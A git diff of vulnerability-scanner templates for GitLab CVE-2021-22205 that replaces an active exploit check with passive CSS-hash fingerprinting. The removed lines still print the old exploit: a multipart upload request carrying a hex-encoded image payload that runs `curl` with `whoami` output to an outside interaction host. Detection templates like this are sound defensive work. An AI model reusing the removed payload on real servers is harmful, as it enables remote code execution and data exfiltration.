diff --git a/cves/2021/CVE-2021-22205-fingerprint.yml b/cves/2021/CVE-2021-22205-fingerprint.yml
deleted file mode 100644
index 74802c447a..0000000000
--- a/cves/2021/CVE-2021-22205-fingerprint.yml
+++ /dev/null
@@ -1,127 +0,0 @@
-id: CVE-2021-22205-fingerprint
-
-info:
- name: Fingerprinting GitLab CE/EE Unauthenticated RCE using ExifTool (No Exploit)
- author: GitLab Red Team
- description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution. This template attempts to passively identify vulnerable versions of GitLab without the need for an exploit by matching unique hashes for the application-.css file in the header for unauthenticated requests. Positive matches do not guarantee exploitability. Tooling to find relevant hashes based on the semantic version ranges specified in the CVE is linked in the references section below.
- reference:
- - https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/red-team-research/cve-2021-22205-hash-generator
- - https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/red-team-operations/-/issues/196
- - https://gitlab.com/gitlab-org/cves/-/blob/master/2021/CVE-2021-22205.json
- - https://censys.io/blog/cve-2021-22205-it-was-a-gitlab-smash/
- - https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/
- - https://hackerone.com/reports/1154542
- - https://nvd.nist.gov/vuln/detail/CVE-2021-22205
- tags: cve,cve2021,gitlab,rce,oast,fingerprinting
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
- cvss-score: 9.90
- cve-id: CVE-2021-22205
- cwe-id: CWE-20
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/users/sign_in"
- redirects: true
- max-redirects: 3
- matchers-condition: and
- matchers:
- - type: word
- condition: or
- words:
- - "015d088713b23c749d8be0118caeb21039491d9812c75c913f48d53559ab09df"
- - "02aa9533ec4957bb01d206d6eaa51d762c7b7396362f0f7a3b5fb4dd6088745b"
- - "051048a171ccf14f73419f46d3bd8204aa3ed585a72924faea0192f53d42cfce"
- - "08858ced0ff83694fb12cf155f6d6bf450dcaae7192ea3de8383966993724290"
- - "0993beabc8d2bb9e3b8d12d24989426b909921e20e9c6a704de7a5f1dfa93c59"
- - "0a5b4edebfcb0a7be64edc06af410a6fbc6e3a65b76592a9f2bcc9afea7eb753"
- - "1084266bd81c697b5268b47c76565aa86b821126a6b9fe6ea7b50f64971fc96f"
- - "14c313ae08665f7ac748daef8a70010d2ea9b52fd0cae594ffa1ffa5d19c43f4"
- - "1626b2999241b5a658bddd1446648ed0b9cc289de4cc6e10f60b39681a0683c4"
- - "20f01320ba570c73e01af1a2ceb42987bcb7ac213cc585c187bec2370cf72eb6"
- - "27d2c4c4e2fcf6e589e3e1fe85723537333b087003aa4c1d2abcf74d5c899959"
- - "292ca64c0c109481b0855aea6b883a588bd293c6807e9493fc3af5a16f37f369"
- - "2eaf7e76aa55726cc0419f604e58ee73c5578c02c9e21fdbe7ae887925ea92ae"
- - "30a9dffe86b597151eff49443097496f0d1014bb6695a2f69a7c97dc1c27828f"
- - "318ee33e5d14035b04832fa07c492cdf57788adda50bb5219ef75b735cbf00e2"
- - "33313f1ff2602ef43d945e57e694e747eb00344455ddb9b2544491a3af2696a1"
- - "335f8ed58266e502d415f231f6675a32bb35cafcbaa279baa2c0400d4a9872ac"
- - "34031b465d912c7d03e815c7cfaff77a3fa7a9c84671bb663026d36b1acd3f86"
- - "3407a4fd892e9d5024f3096605eb1e25cad75a8bf847d26740a1e6a77e45b087"
- - "340c31a75c5150c5e501ec143849adbed26fed0da5a5ee8c60fb928009ea3b86"
- - "38981e26a24308976f3a29d6e5e2beef57c7acda3ad0d5e7f6f149d58fd09d3d"
- - "3963d28a20085f0725884e2dbf9b5c62300718aa9c6b4b696c842a3f4cf75fcd"
- - "39b154eeefef684cb6d56db45d315f8e9bf1b2cc86cf24d8131c674521f5b514"
- - "39fdbd63424a09b5b065a6cc60c9267d3f49950bf1f1a7fd276fe1ece4a35c09"
- - "3b51a43178df8b4db108a20e93a428a889c20a9ed5f41067d1a2e8224740838e"
- - "3cbf1ae156fa85f16d4ca01321e0965db8cfb9239404aaf52c3cebfc5b4493fb"
- - "40d8ac21e0e120f517fbc9a798ecb5caeef5182e01b7e7997aac30213ef367b3"
- - "4448d19024d3be03b5ba550b5b02d27f41c4bdba4db950f6f0e7136d820cd9e1"
- - "450cbe5102fb0f634c533051d2631578c8a6bae2c4ef1c2e50d4bfd090ce3b54"
- - "455d114267e5992b858fb725de1c1ddb83862890fe54436ffea5ff2d2f72edc8"
- - "4568941e60dbfda3472e3f745cd4287172d4e6cce44bed85390af9e4e2112d0b"
- - "45b2cf643afd34888294a073bf55717ea00860d6a1dca3d301ded1d0040cac44"
- - "473ef436c59830298a2424616d002865f17bb5a6e0334d3627affa352a4fc117"
- - "4990bb27037f3d5f1bffc0625162173ad8043166a1ae5c8505aabe6384935ce2"
- - "4a081f9e3a60a0e580cad484d66fbf5a1505ad313280e96728729069f87f856e"
- - "4abc4e078df94075056919bd59aed6e7a0f95067039a8339b8f614924d8cb160"
- - "504940239aafa3b3a7b49e592e06a0956ecaab8dbd4a5ea3a8ffd920b85d42eb"
- - "52560ba2603619d2ff1447002a60dcb62c7c957451fb820f1894e1ce7c23821c"
- - "530a8dd34c18ca91a31fbae2f41d4e66e253db0343681b3c9640766bf70d8edf"
- - "5440e2dd89d3c803295cc924699c93eb762e75d42178eb3fe8b42a5093075c71"
- - "62e4cc014d9d96f9cbf443186289ffd9c41bdfe951565324891dcf38bcca5a51"
- - "64e10bc92a379103a268a90a7863903eacb56843d8990fff8410f9f109c3b87a"
- - "655ad8aea57bdaaad10ff208c7f7aa88c9af89a834c0041ffc18c928cc3eab1f"
- - "67ac5da9c95d82e894c9efe975335f9e8bdae64967f33652cd9a97b5449216d2"
- - "69a1b8e44ba8b277e3c93911be41b0f588ac7275b91a184c6a3f448550ca28ca"
- - "6ae610d783ba9a520b82263f49d2907a52090fecb3ac37819cea12b67e6d94fb"
- - "70ce56efa7e602d4b127087b0eca064681ecdd49b57d86665da8b081da39408b"
- - "7310c45f08c5414036292b0c4026f281a73cf8a01af82a81257dd343f378bbb5"
- - "73a21594461cbc9a2fb00fc6f94aec1a33ccf435a7d008d764ddd0482e08fc8d"
- - "77566acc818458515231d0a82c131a42890d771ea998b9f578dc38e0eb7e517f"
- - "78812856e55613c6803ecb31cc1864b7555bf7f0126d1dfa6f37376d37d3aeab"
- - "79837fd1939f90d58cc5a842a81120e8cecbc03484362e88081ebf3b7e3830e9"
- - "7b1dcbacca4f585e2cb98f0d48f008acfec617e473ba4fd88de36b946570b8b9"
- - "7f1c7b2bfaa6152740d453804e7aa380077636cad101005ed85e70990ec20ec5"
- - "81c5f2c7b2c0b0abaeb59585f36904031c21b1702c24349404df52834fbd7ad3"
- - "83dc10f687305b22e602ba806619628a90bd4d89be7c626176a0efec173ecff1"
- - "93ebf32a4bd988b808c2329308847edd77e752b38becc995970079a6d586c39b"
- - "969119f639d0837f445a10ced20d3a82d2ea69d682a4e74f39a48a4e7b443d5e"
- - "9b4e140fad97320405244676f1a329679808e02c854077f73422bd8b7797476b"
- - "9c095c833db4364caae1659f4e4dcb78da3b5ec5e9a507154832126b0fe0f08e"
- - "a0c92bafde7d93e87af3bc2797125cba613018240a9f5305ff949be8a1b16528"
- - "a9308f85e95b00007892d451fd9f6beabcd8792b4c5f8cd7524ba7e941d479c9"
- - "ac9b38e86b6c87bf8db038ae23da3a5f17a6c391b3a54ad1e727136141a7d4f5"
- - "ae0edd232df6f579e19ea52115d35977f8bdbfa9958e0aef2221d62f3a39e7d8"
- - "aeddf31361633b3d1196c6483f25c484855e0f243e7f7e62686a4de9e10ec03b"
- - "b50bfeb87fe7bb245b31a0423ccfd866ca974bc5943e568ce47efb4cd221d711"
- - "b64a1277a08c2901915525143cd0b62d81a37de0a64ec135800f519cb0836445"
- - "bb1565ffd7c937bea412482ed9136c6057be50356f1f901379586989b4dfe2ca"
- - "be9a23d3021354ec649bc823b23eab01ed235a4eb730fd2f4f7cdb2a6dee453a"
- - "bec9544b57b8b2b515e855779735ad31c3eacf65d615b4bfbd574549735111e7"
- - "bf1ba5d5d3395adc5bad6f17cc3cb21b3fb29d3e3471a5b260e0bc5ec7a57bc4"
- - "bf1c397958ee5114e8f1dadc98fa9c9d7ddb031a4c3c030fa00c315384456218"
- - "c8d8d30d89b00098edab024579a3f3c0df2613a29ebcd57cdb9a9062675558e4"
- - "c923fa3e71e104d50615978c1ab9fcfccfcbada9e8df638fc27bf4d4eb72d78c"
- - "d0850f616c5b4f09a7ff319701bce0460ffc17ca0349ad2cf7808b868688cf71"
- - "d161b6e25db66456f8e0603de5132d1ff90f9388d0a0305d2d073a67fd229ddb"
- - "d56f0577fbbbd6f159e9be00b274270cb25b60a7809871a6a572783b533f5a3c"
- - "d812b9bf6957fafe35951054b9efc5be6b10c204c127aa5a048506218c34e40f"
- - "dc6b3e9c0fad345e7c45a569f4c34c3e94730c33743ae8ca055aa6669ad6ac56"
- - "def1880ada798c68ee010ba2193f53a2c65a8981871a634ae7e18ccdcd503fa3"
- - "e2578590390a9eb10cd65d130e36503fccb40b3921c65c160bb06943b2e3751a"
- - "e4b6f040fe2e04c86ed1f969fc72710a844fe30c3501b868cb519d98d1fe3fd0"
- - "eb078ffe61726e3898dc9d01ea7955809778bde5be3677d907cbd3b48854e687"
- - "ec9dfedd7bd44754668b208858a31b83489d5474f7606294f6cc0128bb218c6d"
- - "ed4780bb05c30e3c145419d06ad0ab3f48bd3004a90fb99601f40c5b6e1d90fd"
- - "ef53a4f4523a4a0499fb892d9fb5ddb89318538fef33a74ce0bf54d25777ea83"
- - "f154ef27cf0f1383ba4ca59531058312b44c84d40938bc8758827023db472812"
- - "f7d1309f3caef67cb63bd114c85e73b323a97d145ceca7d6ef3c1c010078c649"
- - "f9ab217549b223c55fa310f2007a8f5685f9596c579f5c5526e7dcb204ba0e11"
- extractors:
- - type: regex
- name: matched_hash
- group: 1
- regex:
- - '(?:application-)(\S{64})(?:\.css)'
\ No newline at end of file
diff --git a/cves/2021/CVE-2021-22205.yaml b/cves/2021/CVE-2021-22205.yaml
index 9315682bf1..7da8674932 100644
--- a/cves/2021/CVE-2021-22205.yaml
+++ b/cves/2021/CVE-2021-22205.yaml
@@ -1,63 +1,128 @@ id: CVE-2021-22205 info: - name: GitLab CE/EE Unauthenticated RCE using ExifTool - author: pdteam + name: Fingerprinting GitLab CE/EE Unauthenticated RCE using ExifTool - Passive Detection + author: GitLab Red Team severity: critical - description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution. + description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution. This template attempts to passively identify vulnerable versions of GitLab without the need for an exploit by matching unique hashes for the application-.css file in the header for unauthenticated requests. Positive matches do not guarantee exploitability. Tooling to find relevant hashes based on the semantic version ranges specified in the CVE is linked in the references section below. 
reference: + - https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/red-team-research/cve-2021-22205-hash-generator + - https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/red-team-operations/-/issues/196 + - https://gitlab.com/gitlab-org/cves/-/blob/master/2021/CVE-2021-22205.json + - https://censys.io/blog/cve-2021-22205-it-was-a-gitlab-smash/ - https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/ - https://hackerone.com/reports/1154542 - https://nvd.nist.gov/vuln/detail/CVE-2021-22205 - tags: cve,cve2021,gitlab,rce,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H cvss-score: 9.90 cve-id: CVE-2021-22205 cwe-id: CWE-20 + tags: cve,cve2021,gitlab,rce requests: - - raw: - - | - GET /users/sign_in HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} + - method: GET + path: + - "{{BaseURL}}/users/sign_in" - - | - POST /uploads/user HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5 - X-CSRF-Token: {{csrf-token}} - - {{hex_decode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}}curl 
`whoami`.{{interactsh-url}}{{hex_decode('7D202E205C0A2220622022292029202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020200A0D0A2D2D2D2D2D2D5765624B6974466F726D426F756E64617279494D76336D7852673539546B465358352D2D0D0A')}} - - cookie-reuse: true - matchers-condition: and + redirects: true + max-redirects: 3 matchers: - type: word words: - - 'Failed to process image' - - - type: word - part: interactsh_protocol # Confirms the DNS Interaction - words: - - "dns" - - - type: status - status: - - 422 + - "015d088713b23c749d8be0118caeb21039491d9812c75c913f48d53559ab09df" + - "02aa9533ec4957bb01d206d6eaa51d762c7b7396362f0f7a3b5fb4dd6088745b" + - "051048a171ccf14f73419f46d3bd8204aa3ed585a72924faea0192f53d42cfce" + - "08858ced0ff83694fb12cf155f6d6bf450dcaae7192ea3de8383966993724290" + - "0993beabc8d2bb9e3b8d12d24989426b909921e20e9c6a704de7a5f1dfa93c59" + - "0a5b4edebfcb0a7be64edc06af410a6fbc6e3a65b76592a9f2bcc9afea7eb753" + - "1084266bd81c697b5268b47c76565aa86b821126a6b9fe6ea7b50f64971fc96f" + - "14c313ae08665f7ac748daef8a70010d2ea9b52fd0cae594ffa1ffa5d19c43f4" + - "1626b2999241b5a658bddd1446648ed0b9cc289de4cc6e10f60b39681a0683c4" + - "20f01320ba570c73e01af1a2ceb42987bcb7ac213cc585c187bec2370cf72eb6" + 
- "27d2c4c4e2fcf6e589e3e1fe85723537333b087003aa4c1d2abcf74d5c899959" + - "292ca64c0c109481b0855aea6b883a588bd293c6807e9493fc3af5a16f37f369" + - "2eaf7e76aa55726cc0419f604e58ee73c5578c02c9e21fdbe7ae887925ea92ae" + - "30a9dffe86b597151eff49443097496f0d1014bb6695a2f69a7c97dc1c27828f" + - "318ee33e5d14035b04832fa07c492cdf57788adda50bb5219ef75b735cbf00e2" + - "33313f1ff2602ef43d945e57e694e747eb00344455ddb9b2544491a3af2696a1" + - "335f8ed58266e502d415f231f6675a32bb35cafcbaa279baa2c0400d4a9872ac" + - "34031b465d912c7d03e815c7cfaff77a3fa7a9c84671bb663026d36b1acd3f86" + - "3407a4fd892e9d5024f3096605eb1e25cad75a8bf847d26740a1e6a77e45b087" + - "340c31a75c5150c5e501ec143849adbed26fed0da5a5ee8c60fb928009ea3b86" + - "38981e26a24308976f3a29d6e5e2beef57c7acda3ad0d5e7f6f149d58fd09d3d" + - "3963d28a20085f0725884e2dbf9b5c62300718aa9c6b4b696c842a3f4cf75fcd" + - "39b154eeefef684cb6d56db45d315f8e9bf1b2cc86cf24d8131c674521f5b514" + - "39fdbd63424a09b5b065a6cc60c9267d3f49950bf1f1a7fd276fe1ece4a35c09" + - "3b51a43178df8b4db108a20e93a428a889c20a9ed5f41067d1a2e8224740838e" + - "3cbf1ae156fa85f16d4ca01321e0965db8cfb9239404aaf52c3cebfc5b4493fb" + - "40d8ac21e0e120f517fbc9a798ecb5caeef5182e01b7e7997aac30213ef367b3" + - "4448d19024d3be03b5ba550b5b02d27f41c4bdba4db950f6f0e7136d820cd9e1" + - "450cbe5102fb0f634c533051d2631578c8a6bae2c4ef1c2e50d4bfd090ce3b54" + - "455d114267e5992b858fb725de1c1ddb83862890fe54436ffea5ff2d2f72edc8" + - "4568941e60dbfda3472e3f745cd4287172d4e6cce44bed85390af9e4e2112d0b" + - "45b2cf643afd34888294a073bf55717ea00860d6a1dca3d301ded1d0040cac44" + - "473ef436c59830298a2424616d002865f17bb5a6e0334d3627affa352a4fc117" + - "4990bb27037f3d5f1bffc0625162173ad8043166a1ae5c8505aabe6384935ce2" + - "4a081f9e3a60a0e580cad484d66fbf5a1505ad313280e96728729069f87f856e" + - "4abc4e078df94075056919bd59aed6e7a0f95067039a8339b8f614924d8cb160" + - "504940239aafa3b3a7b49e592e06a0956ecaab8dbd4a5ea3a8ffd920b85d42eb" + - "52560ba2603619d2ff1447002a60dcb62c7c957451fb820f1894e1ce7c23821c" + - 
"530a8dd34c18ca91a31fbae2f41d4e66e253db0343681b3c9640766bf70d8edf" + - "5440e2dd89d3c803295cc924699c93eb762e75d42178eb3fe8b42a5093075c71" + - "62e4cc014d9d96f9cbf443186289ffd9c41bdfe951565324891dcf38bcca5a51" + - "64e10bc92a379103a268a90a7863903eacb56843d8990fff8410f9f109c3b87a" + - "655ad8aea57bdaaad10ff208c7f7aa88c9af89a834c0041ffc18c928cc3eab1f" + - "67ac5da9c95d82e894c9efe975335f9e8bdae64967f33652cd9a97b5449216d2" + - "69a1b8e44ba8b277e3c93911be41b0f588ac7275b91a184c6a3f448550ca28ca" + - "6ae610d783ba9a520b82263f49d2907a52090fecb3ac37819cea12b67e6d94fb" + - "70ce56efa7e602d4b127087b0eca064681ecdd49b57d86665da8b081da39408b" + - "7310c45f08c5414036292b0c4026f281a73cf8a01af82a81257dd343f378bbb5" + - "73a21594461cbc9a2fb00fc6f94aec1a33ccf435a7d008d764ddd0482e08fc8d" + - "77566acc818458515231d0a82c131a42890d771ea998b9f578dc38e0eb7e517f" + - "78812856e55613c6803ecb31cc1864b7555bf7f0126d1dfa6f37376d37d3aeab" + - "79837fd1939f90d58cc5a842a81120e8cecbc03484362e88081ebf3b7e3830e9" + - "7b1dcbacca4f585e2cb98f0d48f008acfec617e473ba4fd88de36b946570b8b9" + - "7f1c7b2bfaa6152740d453804e7aa380077636cad101005ed85e70990ec20ec5" + - "81c5f2c7b2c0b0abaeb59585f36904031c21b1702c24349404df52834fbd7ad3" + - "83dc10f687305b22e602ba806619628a90bd4d89be7c626176a0efec173ecff1" + - "93ebf32a4bd988b808c2329308847edd77e752b38becc995970079a6d586c39b" + - "969119f639d0837f445a10ced20d3a82d2ea69d682a4e74f39a48a4e7b443d5e" + - "9b4e140fad97320405244676f1a329679808e02c854077f73422bd8b7797476b" + - "9c095c833db4364caae1659f4e4dcb78da3b5ec5e9a507154832126b0fe0f08e" + - "a0c92bafde7d93e87af3bc2797125cba613018240a9f5305ff949be8a1b16528" + - "a9308f85e95b00007892d451fd9f6beabcd8792b4c5f8cd7524ba7e941d479c9" + - "ac9b38e86b6c87bf8db038ae23da3a5f17a6c391b3a54ad1e727136141a7d4f5" + - "ae0edd232df6f579e19ea52115d35977f8bdbfa9958e0aef2221d62f3a39e7d8" + - "aeddf31361633b3d1196c6483f25c484855e0f243e7f7e62686a4de9e10ec03b" + - "b50bfeb87fe7bb245b31a0423ccfd866ca974bc5943e568ce47efb4cd221d711" + - 
"b64a1277a08c2901915525143cd0b62d81a37de0a64ec135800f519cb0836445" + - "bb1565ffd7c937bea412482ed9136c6057be50356f1f901379586989b4dfe2ca" + - "be9a23d3021354ec649bc823b23eab01ed235a4eb730fd2f4f7cdb2a6dee453a" + - "bec9544b57b8b2b515e855779735ad31c3eacf65d615b4bfbd574549735111e7" + - "bf1ba5d5d3395adc5bad6f17cc3cb21b3fb29d3e3471a5b260e0bc5ec7a57bc4" + - "bf1c397958ee5114e8f1dadc98fa9c9d7ddb031a4c3c030fa00c315384456218" + - "c8d8d30d89b00098edab024579a3f3c0df2613a29ebcd57cdb9a9062675558e4" + - "c923fa3e71e104d50615978c1ab9fcfccfcbada9e8df638fc27bf4d4eb72d78c" + - "d0850f616c5b4f09a7ff319701bce0460ffc17ca0349ad2cf7808b868688cf71" + - "d161b6e25db66456f8e0603de5132d1ff90f9388d0a0305d2d073a67fd229ddb" + - "d56f0577fbbbd6f159e9be00b274270cb25b60a7809871a6a572783b533f5a3c" + - "d812b9bf6957fafe35951054b9efc5be6b10c204c127aa5a048506218c34e40f" + - "dc6b3e9c0fad345e7c45a569f4c34c3e94730c33743ae8ca055aa6669ad6ac56" + - "def1880ada798c68ee010ba2193f53a2c65a8981871a634ae7e18ccdcd503fa3" + - "e2578590390a9eb10cd65d130e36503fccb40b3921c65c160bb06943b2e3751a" + - "e4b6f040fe2e04c86ed1f969fc72710a844fe30c3501b868cb519d98d1fe3fd0" + - "eb078ffe61726e3898dc9d01ea7955809778bde5be3677d907cbd3b48854e687" + - "ec9dfedd7bd44754668b208858a31b83489d5474f7606294f6cc0128bb218c6d" + - "ed4780bb05c30e3c145419d06ad0ab3f48bd3004a90fb99601f40c5b6e1d90fd" + - "ef53a4f4523a4a0499fb892d9fb5ddb89318538fef33a74ce0bf54d25777ea83" + - "f154ef27cf0f1383ba4ca59531058312b44c84d40938bc8758827023db472812" + - "f7d1309f3caef67cb63bd114c85e73b323a97d145ceca7d6ef3c1c010078c649" + - "f9ab217549b223c55fa310f2007a8f5685f9596c579f5c5526e7dcb204ba0e11" + condition: or extractors: - type: regex - name: csrf-token - internal: true group: 1 regex: - - 'csrf-token" content="(.*?)" />\n\n\n\n